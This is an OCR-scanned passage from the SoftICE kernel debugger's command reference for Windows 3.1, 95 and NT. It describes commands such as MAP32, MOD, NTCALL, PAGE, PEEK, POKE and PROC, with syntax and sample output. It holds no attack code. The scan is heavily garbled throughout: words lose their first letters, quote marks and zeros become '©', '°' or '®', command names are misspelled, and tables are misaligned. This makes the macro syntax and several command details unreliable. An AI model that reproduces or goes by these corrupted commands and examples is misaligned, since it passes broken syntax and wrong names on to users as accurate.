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Explanation: The macro command name is too short. A macro name must be etween 3 
and 

8 characters long. 

Corrected Example: MACRO aaa = © ‘addr %1'' 


Illegal Definition: MACRO pbsz = ? hibyte(hiword(*(%1-8))) << 5 
Explanation: The macro body must be surrounded by quote characters (° ). 
Corrected Example: MACRO pbsz = °°? hibyte(hiword(*(%1-8))) << 5'' 


Illegal Definition: MACRO tag = ©? *(%2-4)"' 

Explanation: The macro body references parameter %2 without referencing 
arameter %1. 

You cannot reference parameter %n+1 without having referenced parameter %n. 
Corrected Example: MACRO tag = ©? *(%1-4)"' 


: MAP32 
AMAP32 Windows 3.1, Windows 95, Windows NT SystemInformation 
ADisplay a memory map of all 32-bit modules currently loaded in memory. 


%Syntax 
For Windows 3.1 
MAP32 [module-name | module-handle] 


module-name Windows module-name. 
module-handle Base address of a module image. 


For Windows 95 and Windows NT 
MAP32 [module-name | module-handle |address] 


module name Windows module-name. 
module handle Base address of a module image. 
address Any address that falls within an executable image. 


%Use 

MAP32 with no parameters lists information about all 32-bit modules. 

If you specify either a module-name or module-handle as a parameter, only 
ections from the 

module are shown. For each module, one line of data is printed for every ection 
belonging to 

the module. 


Since the MAP32 command takes any address that falls within an executable mage, 
an easy 

way to see the memory map of the module that contains the current EIP is to 
nter: 

MAP32 eip 


For Windows 95 

No matter what process/context you are in, you see the same list of drivers 
ecause memory 

above 2GB is globally mapped. 


You see different lists of applications/DLLs because they are always private o 
an address 
context. 


For Windows NT 

MAP32 lists kernel drivers as well as applications and DLLs that exist in the 
urrent process. 

They can be distinguished in the map because drivers always occupy addresses 
bove 2GB, 
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while applications and DLLs are always below 2GB. 


%Output 

Each line in MAP32's output contains the following information: 
Owner 

Module name. 

Name 

Section name from the executable file. 

0bj# 

Section number from the executable file. 
Address 

Selector:offset address of the section. 

size 

Section's size in bytes. 

Type 

Type and attributes of the section, as follows: 


%Example For Windows 3.1 

The following example illustrates sample output for MAP32 executed on a isual C 
module. 

. IMAP32 msverti1o 


Type Attributes 

CODE Code 

IDATA Initialized Data 

UDATA Uninitialized Data 

RO Read Only 

RW Read/Write 

SHARED Object is shared 

Owner O0bj Name 0bj# Address Size Type 

MSVCRT10 .text 0001 2197:86C81000 00024A00 CODE RO 
MSVCRT10 .bss 0002 219F:86CA6000 00001A00 UDATA RW 
MSVCRT10 .rdata 0003 219F:86CA8000 00000200 IDATA RO 
MSVCRT10 .edata 0004 219F:86CA9000 00005C00 IDATA RO 
MSVCRT10 .data 0005 219F:86CAF000 00006A00 IDATA RW 
MSVCRT10 .idata 0006 219F:86CB6000 00000A00 IDATA RW 
MSVCRT10 .reloc 0007 219F:86CB7000 00001800 IDATA RO 


: MAPV86 
AMAPV86 Windows 3.1, Windows 95, Windows NT SystemInformation 
ADisplay the DOS memory map of the current Virtual Machine. 


%Syntax 
MAPV86 [address] 


address Segment:offset type address. 


%Use 

If no address parameter is specified, a map of the entire current virtual 
achine's V86 address 

space is displayed. Information about the area in the map where a certain 
ddress lies can be 

obtained by specifying the address. 


Pages of DOS VM memory may not be valid (not mapped in) when you enter the 
APV86 

command. If this occurs, the output from the MAPV86 command will terminate ith 
a 

PAGE NOT PRESENT message. Often, just popping out of, and then back into, 
oftICE 

will result in those pages being mapped in. 
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A useful application of the MAPV86 command is in obtaining addresses to which 
symbol 

table must be aligned with the SYMLOC command. DOS programs that were started 
efore 

Windows will not automatically have their symbol information mapped to their 
ocation in 

V86 memory. By obtaining the start of their static code segment (and adding Oh 
to it if the 

program is a .EXE) with the MAPV6 command, and setting the symbol table 
lignment to 

that value, source level debugging for these global DOS programs is possible. 


For Windows NT 

The MAPV86 command is process specific. You must be in an NTVDM process ecause 
these are the only ones that contain V86 boxes. There is no global MSDOS in 
indows NT. 


%Output 
For Windows 3.1 and Windows 95 


The following summary information is displayed by the MAPV86 command: 

VM ID Virtual machine (VM) ID. VM1 is the System VM. 

VM handle 32-bit virtual machine handle. 

CRS pointer VM's 32-bit client register structure pointer. 

VM address 32-bit linear address of the VM. This is the high linear address of 
the 

virtual machine, which is also currently mapped to linear address 0. 


If the current CS:IP belongs to a MAPV86 entry, that line will be highlighted. 
Each line of 

the MAPV86 display contains the following information: 

Start Segment:offset start address of the component. 

Length Length of the component in paragraphs. 

Name Owner name of the component. 


%Example 

The following example illustrates how to use the MAPV86 command to display the 
entire 

V86 map for the current VM: 

. :MAPV86 

ID=01 Handle=80441000 CRS Ptr=80013390 Linear=80C00000 
Start Length Name 

0000:0000 0040 Interrupt Vector Table 

0040:0000 0030 ROM BIOS Variables 

0070:0000 025D I/0 System 

02CD:0000 08E6 DOS 

0BB5:0012 0000 NUMEGA 

0C8B:0000 00E8 SOFTICE1 

0D41:0000 00B6 XMSXXXX0 

10D0:0000 038F SMARTAAR 


: MOD 
AMOD Windows 3.1 SystemInformation 
ADisplay the Windows module list. 


%Syntax 
MOD [partial-name] 


partial-name Prefix of the Windows module name. 
%Use 

This command displays the Windows module list in the Command window. A module 
isa 
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Windows application or DLL. All 16-bit modules will be displayed first, 
followed by all 32 bit 

modules. If a partial name is specified, only those modules that begin with the 
name will be 

displayed. 


%Output 
For each loaded module the following information is displayed: 
module handle 16-bit handle that Windows assigns to each module. It is actually 
a 
16-bit selector of the module database record which is similar in 
format to the EXE header of the module file. 
pe-header Selector:offset of the PE File header for that module. 
Note: A value will only be displayed in this column for 32-bit modules. 
module name Name specified in the .DEF file using the 'NAME' or 'LIBRARY' 
keyword. 
file name Full path and file name of the module's executable file. 


%Example 

The following example shows abbreviated output of MOD to display all modules in 
the 

system: 

. MOD 


hMod PEHeader Module Name .EXE File Name 

0117 KERNEL C:\WINDOWS\SYSTEM\KRNL386.EXE 

0147 SYSTEM C:\WINDOWS\SYSTEM\SYSTEM.DRV 

014F KEYBOARD C:\WINDOWS\SYSTEM\KEYBOARD . DRV 

0167 MOUSE C:\WINDOWS\SYSTEM\LMOUSE .DRV 

01C7 DISPLAY C:\WINDOWS\SYSTEM\VGA.DRV 

01E7 SOUND C:\WINDOWS\SYSTEM\MMSOUND .DRV 

0237 COMM C:\WINDOWS\SYSTEM\COMM. DRV 

0000 2987:80756080 W32SKRNL C:\WINDOWS\SYSTEM\win32s\w32skrnl.dll 
12C7 2987:86C20080 FREECELL C:\WIN32APP\FREECELL\FREECELL.EXE 
1FC7 2987:86C40080 CARDS C:\WIN32APP\FREECELL\CARDS.dll 

1FDF 2987:86C70080 w32scomb C:\WINDOWS\SYSTEM\win32s\w32scomb.dll 
hMod PEHeader Module Name .EXE File Name 


:MOD (NT) 
AMOD Windows 95 and Windows NT SystemInformation 
ADisplay the Windows module list. 


%Syntax 
MOD [partial-name] 


partial-name Prefix of the Windows module name 


%Use 
This command displays the Windows module list in the Command window. If a 
partial name 
is specified, only modules that begin with the name will be displayed.SoftICE 
displays 
modules in the following order: 
16-bit modules 
32-bit driver modules (Windows NT only) 
32-bit application modules 


For Windows 95 

The module list is global. A module is a Windows application or DLL. All 
modules have an 

hMod value. 
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For Windows NT 

The Mod command is process specific. All modules will be displayed that are 
visible within 

the current process. This includes all 16-bit modules, all 32-bit modules, and 
all driver 

modules. This means if you want to see specific modules, you must switch to the 
appropriate 

address context before using the MOD command. 


You can distinguish application modules from driver modules because application 
modules 

have base addresses below 2GB (80000000h). 

The 16-bit modules will be the only modules that have an hMod value. 


%Output 
For each loaded module the following information is displayed: 
module handle 
16-bit handle that Windows assigns to each module. It is actually a 
16-bit selector of the module database record which is similar in 
format to the EXE header of the module file. 
base 
Base linear address of the executable file. This is also used as the 
module handle for 32-bit executables. 
Note: A value will only be displayed in this column for 32-bit modules. 
pe-header 
Selector:offset of the PE File header for that module. 
Note: A value will only be displayed in this column for 32-bit modules. 
module name Name specified in the .DEF file using the 'NAME' or 'LIBRARY' 
keyword. 
file name 
Full path and file name of the module's executable file. 


%Example 
The following example is abbreviated output of MOD used on the NTVDM WOW 
process: 
. : MOD 
hMod Base PEHeader ModuleName File Name 
021F KERNEL D:\WINNT35\SYSTEM32\KRNL386.EXE 
020F SYSTEM D:\WINNT35\SYSTEM32\SYSTEM.DRV 
©1B7 KEYBOARD D:\WINNT35\SYSTEM32\KEYBOARD . DRV 
02B7 MOUSE D:\WINNT35\SYSTEM32\MOUSE .DRV 
©2CF DISPLAY D:\WINNT35\SYSTEM32\VGA.DRV 
©2E7 SOUND D:\WINNT35\SYSTEM32\SOUND .DRV 
0307 COMM D:\WINNT35\SYSTEM32\COMM .DRV 
031F USER D:\WINNT35\SYSTEM32\USER.EXE 
0397 GDI D:\WINNT35\SYSTEM32\GDI.EXE 
0347 WOWEXEC D:\WINNT35\SYSTEM32\WOWEXEC .EXE 
03DF SHELL D:\WINNT35\SYSTEM32\SHELL.DLL 
©C3F WFWNET D:\WINNT35\SYSTEM32\WFWNET .DRV 
OBFF MMSYSTEM D:\WINNT35\SYSTEM32\MMSYSTEM.DLL 
OBF7 TIMER D:\WINNT35\SYSTEM32\TIMER.DRV 
80100000 
80100080 
ntoskrnl \WINNT35\System32\ntoskrnl.exe 
80400000 
80400080 
hal \WINNT35\System32\hal.dll 
80010000 
80010080 
atapi atapi.sys 
80013000 
80013080 
SCSIPORT \WINNT35\System32\Drivers\SCSIPORT.SYS 
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80001000 

80001080 

Atdisk Atdisk.sSsys 

8001B000 

8001B080 

Scsidisk Scsidisk.Ssys 

803AE000 

803AE080 

Fastfat Fastfat.sys 

FB000000 

FB000080 

Floppy \SystemRoot\System32\Drivers\Floppy.SYS 
FB010000 

FB010080 

Scsicdrm \SystemRoot\System32\Drivers\Scsicdrm.SYS 
FB020000 

FB020080 

Fs_Rec \SystemRoot\System32\Drivers\Fs_Rec.SYS 
FB030000 

FB030080 

Null \SystemRoot\System32\Drivers\Null.SYS 
hMod Base PEHeader ModuleName File Name 


:NTCALL 
ANTCALL Windows NT SystemInformation 
ADisplay NTOSKRNL calls used by NTDLL. 


%Syntax 
NTCALL 


%Use 

The NTCALL command displays all NTOSKRNL calls that are used by NTDLL. Many of 

the API's in NTDLL are nothing more than a wrapper for routines in NTOSKRNL, 
where 

the real work is done at level 0. If you use SoftICE to step through one of 
these calls, you will 

see that it immediately performs an INT 2Eh instruction. The INT 2Eh 
instructions serve as 

the interface for transitions between a privilege level 3 API and a privilege 
level 0 routine that 

actually implements the call. 


when an INT 2Eh is executed, the EDX register is set to point at the parameter 
stack frame 

for the API and the EAX register is set to the index number of the function. 
When the current 

instruction pointer reference is an INT 2Eh instruction, the SoftICE 
disassembler will show 

the address of the privilege level 0 routine that will be called when the INT 
2Eh executes, 

along with the number of dword parameters that are being passed in the stack 
frame pointed 

at by EDX. If you wish to see the symbol name of the routine, you must load 
symbols for 

NTOSKRNL and make sure that it is the current symbol table. Refer to TABLE on 
page 194. 


%Output 

The NTCALL command display all the level 0 API's available. For each API, the 
following 

information displays: 
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Func. Hexadecimal index number of the function passed in EAX. 
Address Selector:offset address of the start of the function. 
Params Number of dword parameters passed to the function. 

Name Either the symbolic name of the function, or the offset within 
NTOSKRNL if no symbols are loaded. 


An example of the disassembler output follows. Note how SoftICE indicates that 
the INT 

2Eh instruction's execution result in the NTOSKRNL function _NTSetEvent being 
called 

with 2 dword parameters. 


ntdll!NtSetEvent 

001B:77F8918C MOV EAX, 00000095 

001B:77F89191 LEA EDX, [ESP+04] 

001B:77F89195 INT 2E ; _NtSetEvent(params=02) 
001B:77F89197 RET 0008 


%Example 

The following example shows abbreviated output of the NTCALL command. It can be 
seen 

from this listing that the NTOSKRNL routine, _NTAccessCheck, is located at 

8:80182B9Eh, that it is assigned a function identifier of 1, and that it takes 
8 dword 

parameters. 


00 0008:80160D42 params=06 _NtAcceptConnectPort 

01 0008:80182B9E params=08 _NtAccessCheck 

02 0008:80184234 params=0B _NtAccessCheckAndAuditAlarm 
03 0008:80180C0A params=06 _NtAdjustGroupsToken 

04 0008:80180868 params=06 _NtAdjustPrivilegesToken 

05 0008:8017F9A6 params=02 _NtAlertResumeThread 

06 0008:8017F95E params=01 _NtAlertThread 

07 0008:8014B0C4 params=01 _NtAllocateLocallyUniqueIld 
08 0008:8014B39A params=03 _NtAllocateUuids 


:0 
AO Windows 3.1, Windows 95, Windows NT I/0OPort 
AOutput a value to an 1/0 port. 


%Syntax 
O[size] port value 


size 
port Port address. 
value Byte, word, or dword value as specified by size. 


%Use 

Output to PORT commands are used to write a value to a hardware port. Output 
can be 

done to byte, word, or dword ports. If no size is specified, the default is B. 
All outs are done immediately to the hardware with the exception of the 
interrupt mask 

registers (Port 21h & A1h). These do not take effect until the next time you 
exit from the 

SoftICE screen. 


%Example 

This command performs an out to port 21, which unmasks all interrupts for 
interrupt 

controller one. 

O 21 0 
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Value Description 
B Byte 
W Wo rd 
D Dword 


:OBJDIR 
AOBJDIR Windows NT SystemInformation 
ADisplays objects in a Windows NT Object Manager's object directory. 


%Syntax 
OBJDIR [object-directory-name] 


%Use 

Use the OBJDIR command to display the named objects within the Object Manager's 
object 

directory. Using OBJDIR with no parameters displays the named objects within 
the root 

object directory. To list the objects in a subdirectory, enter the full object 
directory path. 


%Output 
The following information will be displayed by the OBJDIR command: 
Object Address of the object body. 
ObjHdr Address of the object header. 
Name Name of the object. 
Type Windows NT-defined data type of the object. 


%Example 
The following example is abbreviated output of OBJDIR listing objects in the 
Device object 
directory: 
OBJDIR device 
Directory of \Device at FD8E7F30 
Object ObjHdr Name Type 
FD8CC750 FD8CC728 Beep Device 
FD89A030 FD89A008 NwlnkIpx Device 
FD889150 FD889128 Netbios Device 
FD8979F0 FD8979C8 Ip Device 
FD8C9EDO FD8C9EA8 KeyboardClass®O Device 
FD8C5038 FD8C5010 Video0 Device 
FD8C4040 FD8C4018 Video1 Device 


In the following example, the OBJDIR command is used with a specified object 
directory 

pathname to list the objects in the \Device\Harddisk® subdirectory. 

OBJDIR \device\harddisk® 

Directory of \Device\Harddisk©O at FD8D38D0O 

Object ObjHdr Name Type 

FD8D3730 FD8D3708 Partition® Device 

FD8D3410 FD8D33E8 Partition1 Device 

FD8D32DO FD8D32A8 Partition2 Device 

3 Object(s) 


:OBJTAB 
AOBJTAB WindowsNT SystemInformation 
ADisplay entries in the WIN32 user object-handle table. 


%Syntax 
OBJTAB [handle | object-type-name | -h] 


handle Object handle. 
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object-type-name One of the object-type-names, predefined by SoftICE: 
-h Display list of valid object-type-names. 


%Use 

Use the OBJTAB command to display all entries in the master object-handle table 
created 

and maintained by CSRSS, or to obtain information about a specific object or 
objects of a 

certain type. The master object-handle table contains information for 
translating user object- 

handles such as an hwnd or hCursor into the actual data that represents the 
object. 

If you use OBJTAB without parameters, SoftICE lists the full contents of the 
master object- 

handle table. If an object handle is specified, just that object is listed. If 
an object-type-name is 

entered, all objects in the master object-handle table of that type are listed. 
FREE Free handle 

HWND Hwnd 

Menu Menu or Sub-menu object 

Icon (or Crsr) HICON or HCURSOR 

DFRW DeferWindowPos data 

HOOK Hook 

TINF Thread Info data 

QUE (3.51 only) Message queue 

CPD Call Proc Data thunk 

ACCL Accelerator table 

WSTN Workstation object 

DESK (3.51 only) Desktop object 

DDE DDE String 


%Output 
The following information is displayed by the OBJTAB command: 
Object Pointer to the object's data. 
Type Type of the object. 
Id Object's type ID. 
Handle Win32 handle value for the object. 
Owner CSRSS specific instance data for the process or thread that owns the 
object. 
Flags Object's flags. 


%Example 
The following is an abbreviated example using the OBJTAB command without 
parameters or 
options: 
. :OBJTAB 
Object Type Id Handle Owner Flags 
7F2D4DA0 Hwnd 01 0004005C 7F2D5F88 00 
7F2D85B8 Menu 02 0001005D 00298B40 00 
7F2D4E58 Hwnd 01 0003005E 7F2D5F88 00 
7F2D1820 Queue 07 0002005F 00000000 00 
003E50E0 Accel. Table 09 00030060 00298B40 00 


:P 

AP WINDOWS 3.1, WINDOWS 95, WINDOWS NT FLOWCONTROL 
AF10, F12 for P RET 

AExecute one program step. 


%Syntax 
P_[RET] 


%Use 
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The P command is a logical program step. In assembly mode, one instruction at 
the current 

CS:EIP is executed unless the instruction is a call, interrupt, loop, or 
repeated string 

instruction. In those cases, the entire routine or iteration is completed 
before control is 

returned to SoftICE. 


If RET is specified, SoftICE will step until it finds a return or return from 
interrupt 

instruction. This function works in either 16- or 32-bit code and also works in 
level 0 code. 

The P command uses the single step flag for most instructions. For call, 
interrupt, loop, or 

repeated string instructions, a one-time INT 3 style breakpoint execution 
breakpoint is used. 

In source mode one source statement is executed. If the source statement 
involves calling 

another procedure, the call is not followed. The called procedure is treated 
like a single 

statement. 


If the Register window is visible when SoftICE pops up, all registers that have 
been altered 

since the P command was issued will be displayed with the bold video attribute. 
For call 

instructions, this will show what registers a subroutine has not preserved. 

In an unusually long procedure, there can be a noticeable delay when using the 
P_RET 

command, because SoftICE is single stepping every instruction. 


For Windows 95 and Windows NT 

The P command, by default, is thread specific. If the current EIP is executing 
in thread X, 

SoftICE will not break until the program step occurs in thread X. This prevents 
the case of 

Windows NT process switching or thread switching during the program step 
causing 

execution to stop in a different thread or process than the one you were 
debugging. To change 

this behavior, either use the SET command with the THREADP keyword or disable 
thread- 

specific stepping in the troubleshooting SoftICE initialization settings. 


%Example 
To execute one program step, use the command: 
>) 


: PAGE 
APAGE Windows 3.1, Windows 95, Windows NT SystemInformation 
ADisplay page table information. 


%Syntax 
PAGE [address [L length]] 


address Virtual address, segment:offset address, or selector:offset address 
that 

you want to know page table information about, including the virtual 

and physical address. 

length Number of pages to display. 


%Use 
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The PAGE command can be used to list the contents of the current page directory 
or the 
contents of individual page table entries. 


Note: Multiple page directories are used only by Windows NT. 


In the x86 architecture, a page directory contains 1024 4-byte entries, where 
an entry specifies 

the location and attributes of a page table that is used to map a range of 
memory related to the 

entry's position in the directory. (These ranges are shown on the far right in 
the PAGE 

command's output of the page directory.) 


Each entry represents the location and attributes of a specific page within the 
memory range 

mapped by the page table. An x86 processor page is 4KB in size, so a page table 
maps 

4KB/page * 1024 entries = 4MB of memory, and the page directory maps up to 
4MB/page 

table * 1024 entries = 4GB of memory. 


NT 4.0 uses the 4 MB page feature of the Pentium/Pentium Pro processors. 
NTOSKRNAL, 

HAL, and all boot drivers are mapped into a 4 MB page starting at 2 GB 
(80000000h). 

When the address parameter is specified, information about the page table entry 
that maps 

the address is shown. This includes the following: 

. The linear virtual address of the start of the page mapped by the entry. 

. The physical address that corresponds to the start of the page mapped by the 
entry. 

The page table entry attributes of the page. This information corresponds 

directly to 

processor defined attributes. Page table attributes are represented by bits 
that indicate 

whether or not the entry is valid, the page is dirty or has been accessed, 
whether its a 

supervisor or user-mode page, and its access protections. Only bit attributes 
that are set 

are shown by SoftICE. 

The page type. This information is interpreted from the Windows-defined bit 

field in the 

page table entry and the types displayed by SoftICE correspond to Windows 
definitions. 


Use the length parameter with the address parameter to list information about a 
range of 

consecutive page table entries. It should be noted that the PAGE command will 
not cross page 

table boundaries when listing a range. This means that a second PAGE command 
must be 

used to list the pages starting where the first listing stopped, in the case 
that fewer entries are 

listed than you specified. 


If no parameters are specified, the PAGE command shows the contents of the 
current page 

directory. Each line listed represents 4MB of linear address space. The first 
line shows the 

physical and linear address of the page directory. Each following line displays 
the information 
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in each page directory entry. The data shown for each entry is the same as is 
described above 

for individual page table entries, however, in this output addresses represent 
the locations of 

page tables rather than pages. 


%Output 
The following information is displayed by the PAGE command: 
physical address If a page directory is being displayed then this is the 
physical address 
of the page table that a page directory entry refers to. Each page 
directory entry references one page table which controls 4MB of 
memory. 


If an address parameter is entered so that specific pages are displayed, 
then this is the physical address that corresponds to the start of a page. 
linear address For Windows 3.1 and Windows 95 only: If the page directory is 
being 

displayed then this is the virtual address of a page table. This is the 
address you would use in SoftICE to display the page table with the D 
command. 


If specific pages are being displayed, this is the virtual address of a 
page. If a length was entered then this is the virtual address of the start 
of each page. 


attribute This is the attribute of the page directory or page table entry. The 
valid 

attributes are, as follows: 
Windows 3.1, Windows 

95, and Windows NT Windows NT Only 
P Present S Supervisor 

D Dirty RW Read/Write 

A Accessed 4M 4 MB page 

(NT 4.0 only) 

U User 

R Read Only 

NP Not Present 


type For Windows 3.1 and Windows 95 only: Each page directory entry 

has a three-bit field that can be used by the operating system to classify 
page tables. Windows classifies page tables into the following six 
categories: 

If a page is marked Not Present, then all that is displayed is NP followed by 
the dword 

contents of the page table entry. 


%Example 

For Windows 3.1 and Windows 95 

PAGE with no parameters displays page directory information. The following is a 
sample 

PAGE command output: 

PAGE 


Page Directory Physical=002B6000 Linear=006B600 
System Private 

Instance Relock 

VM Hooked 

Physical Linear Attributes Type Linear Address Range 
002B7000 006B7000 P A U System 00000000-003FFFFF 
00109000 00509000 P A U System 00400000-007FFFFF 
0010A000 0050A000 P U System 00800000 -00BFFFFF 
0010B000 0050B000 PU System 00C00000-00FFFFFF 
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0010C000 0050C000 P U System 01000000-013FFFFF 
002B8000 006B8000 P A U System 80000000-803FFFFF 
00106000 00506000 P A U System 80400000-807FFFFF 
00107000 00507000 P U System 80800000 -80BFFFFF 
00108000 00508000 P U System 80C00000-80FFFFFF 
002B7000 006B7000 P A U System 81000000-813FFFFF 


PAGE with an address specified displays the page table entry that corresponds 
to that address. 
In this example, three page table entries are shown starting with the page 
table entry that 
corresponds to address 00106018. Notice that when the length parameter is 
specified, the 

linear address is truncated to the base address of the memory page that 
contains address. 
PAGE 00106018 1 3 


In this example PAGE can be used to find both the virtual and physical address 
of 

selector:offset address. 

PAGE #585:263C 


For Windows NT 

When the Page command displays information on either PTEs or PDES for NT 4.0, 4 
MB 

pages are indicated by a pneumonic 4M in the Attributes field. The following 
sample output 

shows the region starting at 2 GB. 

. : PAGE 


Page Directory Physical=00030000 
Physical Attributes Linear Address Range 
00000000 P A S RW 4M 80000000 - 803FFFFF 
00400000 P A S RW 4M 80400000 - 807FFFFF 
00800000 P A S RW 4M 80800000 - 80BFFFFF 
00C00000 P A S RW 4M 80C00000 - 80FFFFFF 
01034000 P A S RW 4M 81000000 - 813FFFFF 
Linear Physical Attributes Type 

00106000 00006000 PU VM 

00107000 00007000 PU VM 

00108000 00008000 PU VM 

Linear Physical Attributes Type 

0004A89C 00218442 P U Instance 


The following example is a partial listing of output from the PAGE command 
being executed 

without parameters on Windows NT 3.51 so that the page directory contents are 
printed. 

. : PAGE 


Page Directory Physical=00030000 
Physical Attributes Linear Address Range 


00380000 P A U RW 00000000 - 003FFFFF 
00611000 P A U RW 77C00000 - 77FFFFFF 
00610000 P A U RW 7FC00000 - 7FFFFFFF 
00032000 P A S RW 80000000 - 803FFFFF 
00034000 P A S RW 80400000 - 807FFFFF 
00035000 P A S RW 80800000 - 80BFFFFF 
00033000 P A S RW 80C00000 - 80FFFFFF 
00030000 P A S RW C0000000 - CO3FFFFF 
00040000 P A S RW C0400000 - CO7FFFFF 
00001000 P A S RW COC00000 - COFFFFFF 
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Here is an example of the PAGE command being used to display the attributes and 
addresses 

of the page that instructions are currently being executed from. 

.:PAGE eip 


Linear Physical Attributes 
80404292 00404292 P D A S RW 


: PAUSE 
APAUSE Windows 3.1, Windows 95, Windows NT Customization 
NAPause after each screen. 


%Syntax 
PAUSE [on | off] 


%Use 

The PAUSE command controls screen pause at the end of each page. If PAUSE is 
on, you are 

prompted to press any key before information scrolls off the Command window. 
The prompt 

displays in the status line at the bottom of the Command window. 

If you do not specify a parameter, the current state of PAUSE displays. 


The default is PAUSE on. 


%Example 

The following command specifies that the subsequent Command window display will 
not 

automatically scroll off the screen. You are prompted to press a key before 
information scrolls 

off the screen. 

PAUSE on 

See Also SET 


:PCI 
APCI Windows 95, Windows NT SystemInformation 
ADump the configuration registers for each PCI device in the system. 


%Syntax 
PCI 


%Use 

The PCI command dumps the registers for each PCI device in the system. Do not 
use this 

command on non-PCI systems. Many of the entries are self-explanatory, but some 
are not. 

Consult the PCI specification for more information about this output. 


%Example 
The following example illustrates a partial sample output for the PCI command: 
.:PCI 


Bus 00 Device 00 Function00 

Vendor: 8086 Intel 

Device: 1237 

Revision: 02 

Device class: 06 Bridge device 

Device subclass: 00 Host bridge 

Device sub-subclass: 00 

Interrupt line: ®0Interrupt pin: 00 Min_Gnt: 00 MaxLat: 00 
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Cache line size: 00 Latency timer: 40 Header type: OOBIST: 00 
I/0:0 Mem:1 BusMAST:1 Special:0 MemInv:0 

Parity:0 Wait:0 SERR:1 Back2Back:0 Snoop:0 

Bus 00 Device 07 Function00 

Vendor: 8086 Intel 

Device: 7000 

Revision: 01 

Device class: 06 Bridge device 

Device subclass: 01 ISA bridge 

Device sub-subclass: 00 

Interrupt line: ®0Interrupt pin: 00 Min_Gnt: 00 MaxLat: 00 
Cache line size: 00 Latency timer: 00 Header type: 80BIST: 00 
I/0:1 Mem:1 BusMAST:1 Special:1 MemInv:0 

Parity:0 Wait:0 SERR:0 Back2Back:0 Snoop:0 


:PEEK. 
APEEK Windows 95, Windows NT Display/Change Memory 
ARead from physical memory. 


%Syntax 
PEEK[size] address 


size B (byte), W (word), or D (dword). Size defaults to B. 
address Physical memory address. 


%Use 

PEEK displays the byte, word, or dword at a given physical memory location. 
PEEK is useful 

for reading memory-mapped I/0 registers. 


%Example 
The following example displays the dword at physical address FF000000: 
PEEKD FF000000 


: PHYS 
APHYS Windows 3.1, Windows 95, Windows NT SystemInformation 
ADisplay all virtual addresses that correspond to a physical address. 


%Syntax 
PHYS physical-address 


physical-address Memory address that the x86 generates after a virtual address 
has been 

translated by its paging unit. It is the address that appears on the 
computer's BUS, and is important when dealing with memory- 

mapped hardware devices such as video memory. 


%Use 

Windows uses x86 virtual addressing support to define a relationship between 
virtual 

addresses, used by all system and user code, and physical addresses that are 
used by the 

underlying hardware. In many cases a physical address range may appear in more 
than one 

page table entry, and therefore more than one virtual address range. 

SoftICE does not accept physical addresses in expressions. To view the contents 
of physical 

memory you must use the PHYS command to obtain linear addresses that can be 
used in 

expressions. 
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For Windows 95 and Windows NT 

The PHYS command is specific to the current address context. It searches the 
Page Tables and 

Page Directory associated with the current SoftICE address context. 


%Example 

Physical address A0000h is the start of VGA video memory. Video memory often 
shows up in 

multiple virtual address in Windows. In this example there are three different 
virtual addresses 

that correspond to physical A0000 as shown: 

. PHYS a0000 

000AO000 

004A0000 

80CA0000 


:POKE. 
APOKE Windows 95, Windows NT Display/Change Memory 
AWrite to physical memory 


%Syntax 
POKE[size] address value 


size B (byte), W (word), or D (dword). Size defaults to B. 
address Physical memory address. 
value Value to write to memory. 


%Use 

POKE writes a byte, word, or dword value to a given physical memory location. 
POKE is 

useful for writing to memory-mapped 1/0 registers. 


%Example 

The following example writes the dword value 0x12345678 to physical address 
FF000000: 

POKED FF000000 12345678 


:PrintScrn 

APrint Screen Key 

AWindows 3.1, Windows 95, Windows NT Customization 
APrint contents of screen. 


%Syntax 
PRINT SCREEN key 


%Use 

Pressing PRINT SCREEN dumps all the information from the SoftICE screen to your 
printer. 

By default, the printer port is LPT1. Use the PRN command to change your 
printer port. 

Since SoftICE accesses the hardware directly for all of its 1/0, Print Screen 
works only on 

printers connected directly to a COM or LPT port. It does not work on network 
printers. 

If you do not want to dump to a printer, choose Save SoftICE History from the 
File menu in 

the SoftICE Loader to write the SoftICE command line window history to a file. 


For Windows 95 and Windows NT 


From a DOS VM, use the DLOG.EXE utility to log the SoftICE Command window 
information. 
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: PRN 
APRN Windows 3.1, Windows 95, Windows NT Customization 
ASet printer output port. 


%Syntax 
PRN [lptx | comx] 


x Decimal number between 1 and 2 for LPT, or between 1 and 4 for 
COM 


%Use 

The PRN command allows you to send output from Print Screen to a different 
printer port. 

If no parameters are supplied, PRN displays the currently assigned printer 
port. 


%Example 
This command causes Print Screen output to go to the COM1 port. 
PRN comi 


A: PROC 
APROC Windows 95, Windows NT SystemInformation 
ADisplay summary information about any or all processes in the system. 


%Syntax 
For Windows 95 
PROC [-xo] [task] 


For Windows NT 

PROC [[-xom] process-type | thread-type] 

-eXtended Display extended information for each thread. 

-Objects Display list of objects in processes handle table. 
-Memory Display information about the memory usage of a process. 
task Task name. 

process-type Process handle, process ID, or process name. 
thread-type Thread handle or thread ID. 


%Use 

If you specify PROC with no options, summary information is presented for one 
or all 

processes in the system. The information the -Memory option provides is also 
included when 

you specify the -eXtended option for Windows NT. It is provided for 
convenience, because 

the amount of extended information displayed is quite large. 


For all process (and thread) times, as well as process memory information, 
SoftICE uses raw 

values from within the 0S data structures without performing calculations to 
convert them 

into standardized units. 


The -Object option displays the object pointer, the object handle, and the 
object type for 

every object in the processes object handle table. Because object information 
is allocated from 

the systems pageable pool, the objects type name will not always be available. 
In this case, 

question marks (???) are displayed. 


%Output 
For Windows 95 
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For each process the following summary information is provided: 
Process Task name. 

pProcess Pointer to process database (pdb). 

Process ID The Ring 3 ID of the process. 

Threads Number of threads the process owns. 

Context Address context. 

DefHeap Default heap. 

DebuggeeCB Debuggee context block. 


For Windows NT 

For each process the following summary information is provided: 

Process Process name. 

KPEB Address of the Kernel Process Environment Block. 

PID Process ID. 

Threads Number of threads the process owns. 

Priority Base priority of the process . 

User Time Relative amount of time the process spent executing code at user 
level. 

Krnl Time Relative amount of time the process spent executing code at the 
kernel 

level. 


Status Current status of the process: 
Running: The process is currently running. 
Ready: The process is in a ready to run state. 
Idle: The process is inactive. 
Swapped: The process is inactive, and its address space has been 
deleted. 
Transition: The process is currently between states. 
Terminating: The process is terminating. 


%Example For Windows 95 
This example lists all the processes in the system. 
. : PROC 


This example shows extended information for GDIDEMO: 

. PROC -x gdidemo 

Process Information for Gdidemo at 81569F04 

Process pProcess ProcessID Threads Context DefHeap DebuggeeCB 
Winword 8156ACA8 FFFC8817 00000001 C10474D4 00400000 00000000 
Gdidemo 81569F04 FFFCBBBB 00000001 C1033E38 00410000 00000000 
Loader32 8156630C FFFC47B3 00000001 C10476DO 00470000 00000000 
Explorer 815614C0 FFFC307F 00000002 C104577C 00440000 00000000 
